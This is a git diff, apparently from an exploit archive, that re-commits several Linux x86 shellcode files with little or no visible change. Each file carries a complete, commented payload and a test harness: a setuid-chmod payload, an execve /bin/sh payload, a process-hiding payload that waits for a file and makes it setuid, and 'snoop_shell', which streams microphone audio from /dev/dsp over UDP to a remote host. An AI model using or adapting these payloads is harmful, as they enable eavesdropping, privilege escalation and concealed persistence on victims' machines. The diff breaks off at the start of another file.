linux/x86 by core\n", - strlen(hellcode)); - shell(); - return 0; -} - +/* exit-core.c by Charles Stevenson + * + * I made this as a chunk you can paste in to make modular remote + * exploits. I use it when I need a process to exit cleanly. + */ +char hellcode[] = /* _exit(1); linux/x86 by core */ +// 7 bytes _exit(1) ... 'cause we're nice >:) by core +"\x31\xc0" // xor %eax,%eax +"\x40" // inc %eax +"\x89\xc3" // mov %eax,%ebx +"\xcd\x80" // int $0x80 +; + +int main(void) +{ + void (*shell)() = (void *)&hellcode; + printf("%d byte _exit(1); linux/x86 by core\n", + strlen(hellcode)); + shell(); + return 0; +} + // milw0rm.com [2005-11-09] \ No newline at end of file diff --git a/platforms/lin_x86/shellcode/13406.c b/platforms/lin_x86/shellcode/13406.c index ab9e97c63..42885b889 100755 --- a/platforms/lin_x86/shellcode/13406.c +++ b/platforms/lin_x86/shellcode/13406.c @@ -1,39 +1,39 @@ -/* readnchmod-core.c by Charles Stevenson - * - * Example of strace output if you pass in "/bin/sh\x00" - * read(0, "/bin/sh\0", 2541) = 8 - * chmod("/bin/sh", 04755) = 0 - * - * Any file path can be given. For example: /tmp/.sneakyguy - * The only caveat is that the string must be NULL terminated. - * This shouldn't be a problem. For multi-stage payloads send - * in this first and then you can send it data with null bytes. - * I made this for rare cases with tight space contraints and - * where read() jmp *%esp is not practical. - * - */ -char hellcode[] = /* read(0,buf,2541); chmod(buf,4755); linux/x86 by core */ -"\x31\xdb"// xor %ebx,%ebx -"\xf7\xe3"// mul %ebx -"\x53"// push %ebx -"\xb6\x09"// mov $0x9,%dh -"\xb2\xed"// mov $0xed,%dl -"\x89\xe1"// mov %esp,%ecx -"\xb0\x03"// mov $0x3,%al -"\xcd\x80"// int $0x80 -"\x89\xd1"// mov %edx,%ecx -"\x89\xe3"// mov %esp,%ebx -"\xb0\x0f"// mov $0xf,%al -"\xcd\x80"// int $0x80 -; - -int main(void) -{ - void (*shell)() = (void *)&hellcode; - printf("%d byte read(0,buf,2541); chmod(buf,4755); linux/x86 by core\n", - strlen(hellcode)); - shell(); - return 0; -} - +/* readnchmod-core.c by Charles Stevenson + * + * Example of strace output if you pass in "/bin/sh\x00" + * read(0, "/bin/sh\0", 2541) = 8 + * chmod("/bin/sh", 04755) = 0 + * + * Any file path can be given. For example: /tmp/.sneakyguy + * The only caveat is that the string must be NULL terminated. + * This shouldn't be a problem. For multi-stage payloads send + * in this first and then you can send it data with null bytes. + * I made this for rare cases with tight space contraints and + * where read() jmp *%esp is not practical. + * + */ +char hellcode[] = /* read(0,buf,2541); chmod(buf,4755); linux/x86 by core */ +"\x31\xdb"// xor %ebx,%ebx +"\xf7\xe3"// mul %ebx +"\x53"// push %ebx +"\xb6\x09"// mov $0x9,%dh +"\xb2\xed"// mov $0xed,%dl +"\x89\xe1"// mov %esp,%ecx +"\xb0\x03"// mov $0x3,%al +"\xcd\x80"// int $0x80 +"\x89\xd1"// mov %edx,%ecx +"\x89\xe3"// mov %esp,%ebx +"\xb0\x0f"// mov $0xf,%al +"\xcd\x80"// int $0x80 +; + +int main(void) +{ + void (*shell)() = (void *)&hellcode; + printf("%d byte read(0,buf,2541); chmod(buf,4755); linux/x86 by core\n", + strlen(hellcode)); + shell(); + return 0; +} + // milw0rm.com [2005-11-09] \ No newline at end of file diff --git a/platforms/lin_x86/shellcode/13408.c b/platforms/lin_x86/shellcode/13408.c index 4af7dfd8d..e9aace862 100755 --- a/platforms/lin_x86/shellcode/13408.c +++ b/platforms/lin_x86/shellcode/13408.c @@ -1,160 +1,160 @@ -/* Placed the listener here http://www.milw0rm.com/down.php?id=1293 /str0ke */ - -/******************************************************************** - hey folks, this is snoop_shell, short and simply it snoops on - /dev/dsp and after attempting to lower the audio quality - will stream any data read on this device over a udp stream - to a remote listening client.. (source should be available at stonedcoder.org) - - the port that this will stream on is whatever the high half - of the ip address is, i figured this will always be over 1024 - so the client will be usable without root privs. - - at 172 bytes, its really bloated for shellcode, but if your - reading this anyway, you probably are just looking to have fun - with it.. - - remember you'll need to change the ip address before you - actually use it.. and if your unlucky enough to have an - ip address that contains a null.. well.. its on you to fix it.. - but you can do that by simply rotating the ipaddress by a bit or - two.. - - mov $0xE8015180,%ebx #192.168.0.116 - ror %ebx #shift right by one bit - - no more null - - - phar[at]stonedcoder[dot]org -*********************************************************************/ - - -char shellcode[] = -"\x31\xc9" //xor %ecx,%ecx -"\x51" //push %ecx # \x00 -"\x68\x2f\x64\x73\x70" //push $0x7073642f # /dsp -"\x68\x2f\x64\x65\x76" //push $0x7665642f # /dev -"\x89\xe3" //mov %esp,%ebx -"\x89\xc8" //mov %ecx,%eax -"\xb1\x02" //mov $0x2,%cl -"\xb0\x05" //mov $0x5,%al -"\xcd\x80" //int $0x80 #open /dev/dsp for reading - -"\x89\xc6" //mov %eax,%esi #preserve fd in esi - -"\x31\xc9" //xor %ecx,%ecx -"\x51" //push %ecx -"\x31\xdb" //xor %ebx,%ebx -"\xb3\x02" //mov $0x2,%bl -"\x53" //push %ebx -"\x53" //push %ebx -"\x4b" //dec %ebx -"\x89\xe1" //mov %esp,%ecx -"\x89\xd8" //mov %ebx,%eax -"\xb0\x66" //mov $0x66,%al -"\xcd\x80" //int $0x80 #create a udp socket - -"\x89\xc7" //mov %eax,%edi #preserve socket in edi - -"\xc1\xc3\x04" //rol $0x4,%ebx -"\x53" //push %ebx -"\x89\xe2" //mov %esp,%edx -"\xb9\x05\x50\x04\xc0" //mov $0xc0045005,%ecx -"\x89\xf3" //mov %esi,%ebx -"\xb0\x36" //mov $0x36,%al -"\xcd\x80" //int $0x80 #ioctl on fd SOUND_PCM_WRITE_BITS (16 bits per samle) - -"\xfe\xc0" //inc %al -"\x89\x04\x24" //mov %eax,(%esp) -"\xfe\xc1" //inc %cl -"\xb0\x36" //mov $0x36,%al -"\xcd\x80" //int $0x80 #ioctl on fd SOUND_PCM_WRITE_CHANNELS (1 channel) - -"\xfe\xc0" //inc %al -"\xc1\xc0\x0d" //rol $0xd,%eax -"\x89\x04\x24" //mov %eax,(%esp) -"\xc1\xc8\x04" //ror $0x8,%eax -"\xb1\x02" //mov $0x2,%cl -"\xb0\x36" //mov $0x36,%al #ioctl on fd SOUND_PCM_WRITE_RATE (8khz) -"\xcd\x80" //int $0x80 - -"\x50" //push %eax -"\x50" //push %eax -"\x89\xc2" //mov %eax,%edx - -/* prepare an area on the stack that looks like an struct in_addr */ - /*your ipv4 ip address*/ -"\xbb" "\xc0\xa8\x0f\x2e" //mov $0x7401a8c0,%ebx #your ipaddress would go here currently set to 192.168.1.116 -"\x53" //push %ebx -"\xc1\xe3\x10" //shl $0x10,%ebx -"\xb3\x02" //mov $0x2,%bl -"\x53" //push %ebx #port and family, (we'll use use the hi half of the address for a port) - -/* allocate 1025 byte buffer on the stack */ -"\x89\xe3" //mov %esp,%ebx -"\x66\xba\x01\x04" //mov $0x401,%dx #create the space on the stack (1025 bytes) -"\x29\xd4" //sub %edx,%esp - -"\x89\xe0" //mov %esp,%eax -"\x31\xc9" //xor %ecx,%ecx -"\xb1\x10" //mov $0x10,%cl -"\x51" //push %ecx -"\x53" //push %ebx -"\x31\xc9" //xor %ecx,%ecx -"\x51" //push %ecx -"\x52" //push %edx -"\x50" //push %eax -"\x57" //push %edi -"\x89\xc2" //mov %eax,%edx -"\x89\xcb" //mov %ecx,%ebx -"\x89\xc8" //mov %ecx,%eax -"\x89\xe1" //mov %esp,%ecx -"\xb3\x0b" //mov $0xb,%bl -"\xb0\x66" //mov $0x66,%al -"\x51" //push %ecx -"\x89\xe7" //mov %esp,%edi #registers and stack are prepared for call to sendto -"\x60" //pusha #push regs onto stack - -"\x89\xf3" //mov %esi,%ebx -"\x89\xd1" //mov %edx,%ecx -"\x89\xd8" //mov %ebx,%eax -"\xb0\x03" //mov $0x3,%al -"\x89\xc2" //mov %eax,%edx -"\x66\xba\x01\x08" //mov $0x401,%dx #registers are prepared for call to read -"\x60" //pusha #push regs - - -"\x89\x27" //mov %esp,(%edi) #store this stack pointer in the memory allocated above -/*loop:*/ // #so that we can restore it for the loop - -"\x61" //popa #pop prepared registers from stack -"\xcd\x80" //int $0x80 #call read - -"\x61" //popa #pop registers again -"\xcd\x80" //int $0x80 #call sendto - -"\x8b\x27" //mov (%edi),%esp #pulls from the memory allocated before and restores esp -"\xeb\xf6" //jmp 80483f5 -; - - - -int main() { -int *ret; -char cnull = 0; - - printf("shellcode_size: %u\n", sizeof(shellcode)); - printf("contains nulls: "); - if(!memmem(shellcode,sizeof(shellcode),&cnull,1)){ - printf("yes\n"); - }else{ - printf("no\n"); - } - - ret = (int *)&ret + 2; - (*ret) = (int)shellcode; - -} - +/* Placed the listener here http://www.milw0rm.com/down.php?id=1293 /str0ke */ + +/******************************************************************** + hey folks, this is snoop_shell, short and simply it snoops on + /dev/dsp and after attempting to lower the audio quality + will stream any data read on this device over a udp stream + to a remote listening client.. (source should be available at stonedcoder.org) + + the port that this will stream on is whatever the high half + of the ip address is, i figured this will always be over 1024 + so the client will be usable without root privs. + + at 172 bytes, its really bloated for shellcode, but if your + reading this anyway, you probably are just looking to have fun + with it.. + + remember you'll need to change the ip address before you + actually use it.. and if your unlucky enough to have an + ip address that contains a null.. well.. its on you to fix it.. + but you can do that by simply rotating the ipaddress by a bit or + two.. + + mov $0xE8015180,%ebx #192.168.0.116 + ror %ebx #shift right by one bit + + no more null + + + phar[at]stonedcoder[dot]org +*********************************************************************/ + + +char shellcode[] = +"\x31\xc9" //xor %ecx,%ecx +"\x51" //push %ecx # \x00 +"\x68\x2f\x64\x73\x70" //push $0x7073642f # /dsp +"\x68\x2f\x64\x65\x76" //push $0x7665642f # /dev +"\x89\xe3" //mov %esp,%ebx +"\x89\xc8" //mov %ecx,%eax +"\xb1\x02" //mov $0x2,%cl +"\xb0\x05" //mov $0x5,%al +"\xcd\x80" //int $0x80 #open /dev/dsp for reading + +"\x89\xc6" //mov %eax,%esi #preserve fd in esi + +"\x31\xc9" //xor %ecx,%ecx +"\x51" //push %ecx +"\x31\xdb" //xor %ebx,%ebx +"\xb3\x02" //mov $0x2,%bl +"\x53" //push %ebx +"\x53" //push %ebx +"\x4b" //dec %ebx +"\x89\xe1" //mov %esp,%ecx +"\x89\xd8" //mov %ebx,%eax +"\xb0\x66" //mov $0x66,%al +"\xcd\x80" //int $0x80 #create a udp socket + +"\x89\xc7" //mov %eax,%edi #preserve socket in edi + +"\xc1\xc3\x04" //rol $0x4,%ebx +"\x53" //push %ebx +"\x89\xe2" //mov %esp,%edx +"\xb9\x05\x50\x04\xc0" //mov $0xc0045005,%ecx +"\x89\xf3" //mov %esi,%ebx +"\xb0\x36" //mov $0x36,%al +"\xcd\x80" //int $0x80 #ioctl on fd SOUND_PCM_WRITE_BITS (16 bits per samle) + +"\xfe\xc0" //inc %al +"\x89\x04\x24" //mov %eax,(%esp) +"\xfe\xc1" //inc %cl +"\xb0\x36" //mov $0x36,%al +"\xcd\x80" //int $0x80 #ioctl on fd SOUND_PCM_WRITE_CHANNELS (1 channel) + +"\xfe\xc0" //inc %al +"\xc1\xc0\x0d" //rol $0xd,%eax +"\x89\x04\x24" //mov %eax,(%esp) +"\xc1\xc8\x04" //ror $0x8,%eax +"\xb1\x02" //mov $0x2,%cl +"\xb0\x36" //mov $0x36,%al #ioctl on fd SOUND_PCM_WRITE_RATE (8khz) +"\xcd\x80" //int $0x80 + +"\x50" //push %eax +"\x50" //push %eax +"\x89\xc2" //mov %eax,%edx + +/* prepare an area on the stack that looks like an struct in_addr */ + /*your ipv4 ip address*/ +"\xbb" "\xc0\xa8\x0f\x2e" //mov $0x7401a8c0,%ebx #your ipaddress would go here currently set to 192.168.1.116 +"\x53" //push %ebx +"\xc1\xe3\x10" //shl $0x10,%ebx +"\xb3\x02" //mov $0x2,%bl +"\x53" //push %ebx #port and family, (we'll use use the hi half of the address for a port) + +/* allocate 1025 byte buffer on the stack */ +"\x89\xe3" //mov %esp,%ebx +"\x66\xba\x01\x04" //mov $0x401,%dx #create the space on the stack (1025 bytes) +"\x29\xd4" //sub %edx,%esp + +"\x89\xe0" //mov %esp,%eax +"\x31\xc9" //xor %ecx,%ecx +"\xb1\x10" //mov $0x10,%cl +"\x51" //push %ecx +"\x53" //push %ebx +"\x31\xc9" //xor %ecx,%ecx +"\x51" //push %ecx +"\x52" //push %edx +"\x50" //push %eax +"\x57" //push %edi +"\x89\xc2" //mov %eax,%edx +"\x89\xcb" //mov %ecx,%ebx +"\x89\xc8" //mov %ecx,%eax +"\x89\xe1" //mov %esp,%ecx +"\xb3\x0b" //mov $0xb,%bl +"\xb0\x66" //mov $0x66,%al +"\x51" //push %ecx +"\x89\xe7" //mov %esp,%edi #registers and stack are prepared for call to sendto +"\x60" //pusha #push regs onto stack + +"\x89\xf3" //mov %esi,%ebx +"\x89\xd1" //mov %edx,%ecx +"\x89\xd8" //mov %ebx,%eax +"\xb0\x03" //mov $0x3,%al +"\x89\xc2" //mov %eax,%edx +"\x66\xba\x01\x08" //mov $0x401,%dx #registers are prepared for call to read +"\x60" //pusha #push regs + + +"\x89\x27" //mov %esp,(%edi) #store this stack pointer in the memory allocated above +/*loop:*/ // #so that we can restore it for the loop + +"\x61" //popa #pop prepared registers from stack +"\xcd\x80" //int $0x80 #call read + +"\x61" //popa #pop registers again +"\xcd\x80" //int $0x80 #call sendto + +"\x8b\x27" //mov (%edi),%esp #pulls from the memory allocated before and restores esp +"\xeb\xf6" //jmp 80483f5 +; + + + +int main() { +int *ret; +char cnull = 0; + + printf("shellcode_size: %u\n", sizeof(shellcode)); + printf("contains nulls: "); + if(!memmem(shellcode,sizeof(shellcode),&cnull,1)){ + printf("yes\n"); + }else{ + printf("no\n"); + } + + ret = (int *)&ret + 2; + (*ret) = (int)shellcode; + +} + // milw0rm.com [2005-11-04] \ No newline at end of file diff --git a/platforms/lin_x86/shellcode/13409.c b/platforms/lin_x86/shellcode/13409.c index 47da93dd8..7c32c4766 100755 --- a/platforms/lin_x86/shellcode/13409.c +++ b/platforms/lin_x86/shellcode/13409.c @@ -1,61 +1,61 @@ -/* - lnx_binsh4.c - v1 - 21 Byte /bin/sh Opcode Array Payload - Copyright(c) 2004 c0ntex - - This program is free software; you can redistribute it and/or modify - it under the terms of the GNU General Public License as published by - the Free Software Foundation; either version 2 of the License, or - (at your option) any later version. - - This program is distributed in the hope that it will be useful, - but WITHOUT ANY WARRANTY; without even the implied warranty of - MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the - GNU General Public License for more details. - - You should have received a copy of the GNU General Public License - along with this program; if not, write to the Free Software - Foundation, Inc., 59 Temple Place, Suite 330, Boston, - MA 02111-1307 USA -*/ - -/* - Calling: execve(/bin/sh) -*/ - -#include - -typedef char wikkid; - -wikkid oPc0d3z[] = "\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80" - -unsigned long grab_esp() -{ - __asm__(" - xorl %eax,%eax - movl %eax,%ebx - movl %esp,%eax - "); -} - -int main(void) -{ - unsigned long delta; - void (*pointer)(); - - delta = grab_esp(); - - fprintf(stderr, "\n[-] Stack Pointer found -> [0x%x]\n", delta); - fprintf(stderr, "\t[-] Size of payload egg -> [%d]\n", sizeof(oPc0d3z)); - - pointer=(void*)&oPc0d3z; - - while(pointer) { - fprintf(stderr, "\t[-] Payload Begin -> [0x%x]\n", pointer); - fprintf(stderr, "\t[-] Payload End -> [0x%x]\n\n", pointer+21); - pointer(); - } - - _exit(0x01); -} - +/* + lnx_binsh4.c - v1 - 21 Byte /bin/sh Opcode Array Payload + Copyright(c) 2004 c0ntex + + This program is free software; you can redistribute it and/or modify + it under the terms of the GNU General Public License as published by + the Free Software Foundation; either version 2 of the License, or + (at your option) any later version. + + This program is distributed in the hope that it will be useful, + but WITHOUT ANY WARRANTY; without even the implied warranty of + MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the + GNU General Public License for more details. + + You should have received a copy of the GNU General Public License + along with this program; if not, write to the Free Software + Foundation, Inc., 59 Temple Place, Suite 330, Boston, + MA 02111-1307 USA +*/ + +/* + Calling: execve(/bin/sh) +*/ + +#include + +typedef char wikkid; + +wikkid oPc0d3z[] = "\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80" + +unsigned long grab_esp() +{ + __asm__(" + xorl %eax,%eax + movl %eax,%ebx + movl %esp,%eax + "); +} + +int main(void) +{ + unsigned long delta; + void (*pointer)(); + + delta = grab_esp(); + + fprintf(stderr, "\n[-] Stack Pointer found -> [0x%x]\n", delta); + fprintf(stderr, "\t[-] Size of payload egg -> [%d]\n", sizeof(oPc0d3z)); + + pointer=(void*)&oPc0d3z; + + while(pointer) { + fprintf(stderr, "\t[-] Payload Begin -> [0x%x]\n", pointer); + fprintf(stderr, "\t[-] Payload End -> [0x%x]\n\n", pointer+21); + pointer(); + } + + _exit(0x01); +} + // milw0rm.com [2005-09-15] \ No newline at end of file diff --git a/platforms/lin_x86/shellcode/13410.s b/platforms/lin_x86/shellcode/13410.s index 0ddbb13c0..01321a1f1 100755 --- a/platforms/lin_x86/shellcode/13410.s +++ b/platforms/lin_x86/shellcode/13410.s @@ -1,321 +1,321 @@ -#=============================================================================================# -# hide-wait-change (final v4) # -# ------------------------------------------------------------------------------------------- # -# Author: xort (rrs@clyde.dcccd.edu) # -# Date: 09/14/2005 3:35pm # -# Type: shellcode/(x86-linux).s, (at&t) # -# Size: strlen(fake-proc-name) + strlen(file-to-change) + 187 # -# Discription: This is a shellcode that will infect a process, play some argv[0] games among # -# other tricks to hide itself from 'ps', and waits until the creation of a # -# specified file. Once this file is found to exist, its permissions are changed # -# to 04555. Original concept concived by izik. # -############################################################################################### - -.section .text - - .global _start - - ################################################################################### - ## ## - ## _start: 1) fork() a new process ## - ## 2) check to see if we are child process ## - ## 3) if we are then _exit() ## - ## ## - ################################################################################### - - - _start: - - - #-------------------------------------------# - # we start with a fork() # - #-------------------------------------------# - - push $0x02 - pop %eax - int $0x80 - - - #-------------------------------------------# - # child or parent? # - #-------------------------------------------# - - test %eax, %eax - je proc_name - - - #-------------------------------------------# - # parent goes exit() # - #-------------------------------------------# - - push $0x01 - pop %eax - int $0x80 - - - ################################################################################### - ## ## - ## 1) get address of "/proc/self/stat" and fix null@end ## - ## 2) open() "/proc/self/stat" ## - ## 3) read in 250 bytes from file ## - ## ## - ################################################################################### - - - #-------------------------------------------# - # grab "/proc" string location # - #-------------------------------------------# - - ret_w_proc: pop %ebx - lea 0x10(%ebx), %esi - - #-------------------------------------------# - # fix "/proc" string to include c-string # - # terminator # - #-------------------------------------------# - - incb 0xf(%ebx) - - - ################################################################################### - ## ## - ## Open "/proc/self/stat" and read in 250 bytes ## - ## ## - ################################################################################### - - - #-------------------------------------------# - # open() the file # - #-------------------------------------------# - - cdq - xor %ecx, %ecx - movb $0x5, %al - int $0x80 - - - #------------------------------------------# - # read() 250-bytes from the file into # - # ESP-250 # - #------------------------------------------# - - xchg %eax, %ebx # store fd-pointer in ebx - push $0x3 - pop %eax - movb $250, %dl - mov %esp, %ecx - sub %edx, %ecx - int $0x80 - - mov %ecx, %edi - add %eax, %edi - - - ################################################################################### - ## ## - ## 1) Get location of pointer to argv[0] from file (NF-13) ## - ## 2) Convert it to binary ## - ## 3) use that to find real argv[0]s location ## - ## 4) null-out all args with 0x0 ## - ## ## - ################################################################################### - - - #------------------------------------------# - # scan for the decimal-string of the # - # location of argc & argv[0] # - #------------------------------------------# - - xchg %eax, %ebx - - std - push $0x20 - pop %eax - push $14 - pop %ecx - - findargs: - xchg %ecx, %ebx - repne scasb - xchg %ecx, %ebx - loop findargs - inc %edi - inc %edi - - - #------------------------------------------# - # translate string into a real number to # - # obtain pointer. # - #------------------------------------------# - - xor %eax, %eax - push $10 - pop %ebx - cld - - calcloop: - xor %edx, %edx - movb (%edi), %cl - subl $0x30, %ecx - addl %ecx, %eax - inc %edi - cmpb $0x20, (%edi) - je done_gotnum - mul %ebx - jmp calcloop - - - #------------------------------------------# - # once we have the location in memory of # - # pointers to argc,argv[0-?], and envp, # - # extract the location of argv[0] # - #------------------------------------------# - - done_gotnum: - xchg %eax, %esp - pop %edi - pop %edi - xchg %eax, %esp - - - #------------------------------------------# - # write 255 null characters past argv[0] # - # to overwrite it and any other args so ps # - # wont see them later # - #------------------------------------------# - - push %edi - movb $0xff, %cl - xor %eax, %eax - rep stosb - pop %edi - - - - ################################################################################### - ## ## - ## 1) Get location of string we are going to copy over argv[0] and fix ## - ## null@end. ## - ## 2) Call setsid() to extablish us as a process leader. ## - ## 3) Jump over strings into shellcode. ## - ## ## - ################################################################################### - - - #------------------------------------------# - # Get string location, fix nullchar and # - # copy over argv[0], # - #------------------------------------------# - - - push %esi - dec %esi - findend: - inc %esi - inc %ecx - cmpb $0xff, (%esi) - jne findend - - incb (%esi) - pop %esi - rep movsb - - - #------------------------------------------# - # Call setsid() to establish us as a # - # process leader. # - #------------------------------------------# - - movb $66, %al - int $0x80 - - mov %esi, %edi - xchg %eax, %edx - - dec %eax - mov %eax, %ecx - repne scasb - - incb -1(%edi) - - - #------------------------------------------# - # Jump over strings into shellcode # - #------------------------------------------# - - jmp *%edi - - - ################################################################################### - ## STRINGS ## - ################################################################################### - - - proc_name: - call ret_w_proc - .ascii "/proc/self/stat\xff" - - replace_string: - .ascii "haha\xff" - - filename: - .ascii "/tmp/foo\xff" - - - ################################################################################### - # # - # SHELLCODE # - # 1) call nanosleep(60) # - # 2) check to see if FILENAME exist w/ access() # - # 3) if it does, then chmod 04555 FILENAME and exit # - # 4) _exit() # - # # - ################################################################################### - - shellcode: - push $60 - - checkforfile: - inc %eax - - #------------------------------------------# - # nanosleep(%edi) # - #------------------------------------------# - mov %esp, %ecx - mov %esp, %ecx - mov %esp, %ebx - xorb $0xa2, %al - int $0x80 - - - #------------------------------------------# - # access((%esi),0) # - #------------------------------------------# - - xor %ecx, %ecx - mov %esi, %ebx - xorb $0x21, %al - int $0x80 - - test %eax, %eax - jne checkforfile - - - #------------------------------------------# - # chmod((%esi),04555) # - #------------------------------------------# - - movb $0xf, %al - movw $0x96d, %cx - int $0x80 - - - #------------------------------------------# - # _exit() # - #------------------------------------------# - - inc %eax - int $0x80 - - +#=============================================================================================# +# hide-wait-change (final v4) # +# ------------------------------------------------------------------------------------------- # +# Author: xort (rrs@clyde.dcccd.edu) # +# Date: 09/14/2005 3:35pm # +# Type: shellcode/(x86-linux).s, (at&t) # +# Size: strlen(fake-proc-name) + strlen(file-to-change) + 187 # +# Discription: This is a shellcode that will infect a process, play some argv[0] games among # +# other tricks to hide itself from 'ps', and waits until the creation of a # +# specified file. Once this file is found to exist, its permissions are changed # +# to 04555. Original concept concived by izik. # +############################################################################################### + +.section .text + + .global _start + + ################################################################################### + ## ## + ## _start: 1) fork() a new process ## + ## 2) check to see if we are child process ## + ## 3) if we are then _exit() ## + ## ## + ################################################################################### + + + _start: + + + #-------------------------------------------# + # we start with a fork() # + #-------------------------------------------# + + push $0x02 + pop %eax + int $0x80 + + + #-------------------------------------------# + # child or parent? # + #-------------------------------------------# + + test %eax, %eax + je proc_name + + + #-------------------------------------------# + # parent goes exit() # + #-------------------------------------------# + + push $0x01 + pop %eax + int $0x80 + + + ################################################################################### + ## ## + ## 1) get address of "/proc/self/stat" and fix null@end ## + ## 2) open() "/proc/self/stat" ## + ## 3) read in 250 bytes from file ## + ## ## + ################################################################################### + + + #-------------------------------------------# + # grab "/proc" string location # + #-------------------------------------------# + + ret_w_proc: pop %ebx + lea 0x10(%ebx), %esi + + #-------------------------------------------# + # fix "/proc" string to include c-string # + # terminator # + #-------------------------------------------# + + incb 0xf(%ebx) + + + ################################################################################### + ## ## + ## Open "/proc/self/stat" and read in 250 bytes ## + ## ## + ################################################################################### + + + #-------------------------------------------# + # open() the file # + #-------------------------------------------# + + cdq + xor %ecx, %ecx + movb $0x5, %al + int $0x80 + + + #------------------------------------------# + # read() 250-bytes from the file into # + # ESP-250 # + #------------------------------------------# + + xchg %eax, %ebx # store fd-pointer in ebx + push $0x3 + pop %eax + movb $250, %dl + mov %esp, %ecx + sub %edx, %ecx + int $0x80 + + mov %ecx, %edi + add %eax, %edi + + + ################################################################################### + ## ## + ## 1) Get location of pointer to argv[0] from file (NF-13) ## + ## 2) Convert it to binary ## + ## 3) use that to find real argv[0]s location ## + ## 4) null-out all args with 0x0 ## + ## ## + ################################################################################### + + + #------------------------------------------# + # scan for the decimal-string of the # + # location of argc & argv[0] # + #------------------------------------------# + + xchg %eax, %ebx + + std + push $0x20 + pop %eax + push $14 + pop %ecx + + findargs: + xchg %ecx, %ebx + repne scasb + xchg %ecx, %ebx + loop findargs + inc %edi + inc %edi + + + #------------------------------------------# + # translate string into a real number to # + # obtain pointer. # + #------------------------------------------# + + xor %eax, %eax + push $10 + pop %ebx + cld + + calcloop: + xor %edx, %edx + movb (%edi), %cl + subl $0x30, %ecx + addl %ecx, %eax + inc %edi + cmpb $0x20, (%edi) + je done_gotnum + mul %ebx + jmp calcloop + + + #------------------------------------------# + # once we have the location in memory of # + # pointers to argc,argv[0-?], and envp, # + # extract the location of argv[0] # + #------------------------------------------# + + done_gotnum: + xchg %eax, %esp + pop %edi + pop %edi + xchg %eax, %esp + + + #------------------------------------------# + # write 255 null characters past argv[0] # + # to overwrite it and any other args so ps # + # wont see them later # + #------------------------------------------# + + push %edi + movb $0xff, %cl + xor %eax, %eax + rep stosb + pop %edi + + + + ################################################################################### + ## ## + ## 1) Get location of string we are going to copy over argv[0] and fix ## + ## null@end. ## + ## 2) Call setsid() to extablish us as a process leader. ## + ## 3) Jump over strings into shellcode. ## + ## ## + ################################################################################### + + + #------------------------------------------# + # Get string location, fix nullchar and # + # copy over argv[0], # + #------------------------------------------# + + + push %esi + dec %esi + findend: + inc %esi + inc %ecx + cmpb $0xff, (%esi) + jne findend + + incb (%esi) + pop %esi + rep movsb + + + #------------------------------------------# + # Call setsid() to establish us as a # + # process leader. # + #------------------------------------------# + + movb $66, %al + int $0x80 + + mov %esi, %edi + xchg %eax, %edx + + dec %eax + mov %eax, %ecx + repne scasb + + incb -1(%edi) + + + #------------------------------------------# + # Jump over strings into shellcode # + #------------------------------------------# + + jmp *%edi + + + ################################################################################### + ## STRINGS ## + ################################################################################### + + + proc_name: + call ret_w_proc + .ascii "/proc/self/stat\xff" + + replace_string: + .ascii "haha\xff" + + filename: + .ascii "/tmp/foo\xff" + + + ################################################################################### + # # + # SHELLCODE # + # 1) call nanosleep(60) # + # 2) check to see if FILENAME exist w/ access() # + # 3) if it does, then chmod 04555 FILENAME and exit # + # 4) _exit() # + # # + ################################################################################### + + shellcode: + push $60 + + checkforfile: + inc %eax + + #------------------------------------------# + # nanosleep(%edi) # + #------------------------------------------# + mov %esp, %ecx + mov %esp, %ecx + mov %esp, %ebx + xorb $0xa2, %al + int $0x80 + + + #------------------------------------------# + # access((%esi),0) # + #------------------------------------------# + + xor %ecx, %ecx + mov %esi, %ebx + xorb $0x21, %al + int $0x80 + + test %eax, %eax + jne checkforfile + + + #------------------------------------------# + # chmod((%esi),04555) # + #------------------------------------------# + + movb $0xf, %al + movw $0x96d, %cx + int $0x80 + + + #------------------------------------------# + # _exit() # + #------------------------------------------# + + inc %eax + int $0x80 + + # milw0rm.com [2005-09-09] \ No newline at end of file diff --git a/platforms/lin_x86/shellcode/13411.c b/platforms/lin_x86/shellcode/13411.c index 29d92dda9..db181cdae 100755 --- a/platforms/lin_x86/shellcode/13411.c +++ b/platforms/lin_x86/shellcode/13411.c @@ -38,6 +38,6 @@ char shellcode[]= "\x6a" // "\x03" // sleep-time "\x40\x89\xe1\x89\xe3\x34\xa2\xcd\x80\x31\xc9\x89\xf3\x34\x21\xcd" -"\x80\x85\xc0\x75\xeb\xb0\x0f\x66\xb9\x6d\x09\xcd\x80\x40\xcd\x80"; - +"\x80\x85\xc0\x75\xeb\xb0\x0f\x66\xb9\x6d\x09\xcd\x80\x40\xcd\x80"; + // milw0rm.com [2005-09-08] \ No newline at end of file diff --git a/platforms/lin_x86/shellcode/13412.c b/platforms/lin_x86/shellcode/13412.c index 29460d63a..50881051e 100755 --- a/platforms/lin_x86/shellcode/13412.c +++ b/platforms/lin_x86/shellcode/13412.c @@ -126,6 +126,6 @@ int main(void) } _exit(0); -} - +} + // milw0rm.com [2005-09-04] \ No newline at end of file diff --git a/platforms/lin_x86/shellcode/13413.c b/platforms/lin_x86/shellcode/13413.c index 017c4ebf2..b0b440b6b 100755 --- a/platforms/lin_x86/shellcode/13413.c +++ b/platforms/lin_x86/shellcode/13413.c @@ -126,6 +126,6 @@ int main(void) } _exit(0); -} - +} + // milw0rm.com [2005-08-25] \ No newline at end of file diff --git a/platforms/lin_x86/shellcode/13414.c b/platforms/lin_x86/shellcode/13414.c index 0e6341f07..72b6e4da6 100755 --- a/platforms/lin_x86/shellcode/13414.c +++ b/platforms/lin_x86/shellcode/13414.c @@ -116,6 +116,6 @@ int main(void) } _exit(0); -} - +} + // milw0rm.com [2005-08-19] \ No newline at end of file diff --git a/platforms/lin_x86/shellcode/13416.txt b/platforms/lin_x86/shellcode/13416.txt index 3c29069dd..8f3ac423b 100755 --- a/platforms/lin_x86/shellcode/13416.txt +++ b/platforms/lin_x86/shellcode/13416.txt @@ -192,6 +192,6 @@ upload ( char* ip ) close ( fd ); close ( s ); return ( 0 ); -} - +} + # milw0rm.com [2005-06-19] \ No newline at end of file diff --git a/platforms/lin_x86/shellcode/13417.c b/platforms/lin_x86/shellcode/13417.c index 330657e99..96e0a6579 100755 --- a/platforms/lin_x86/shellcode/13417.c +++ 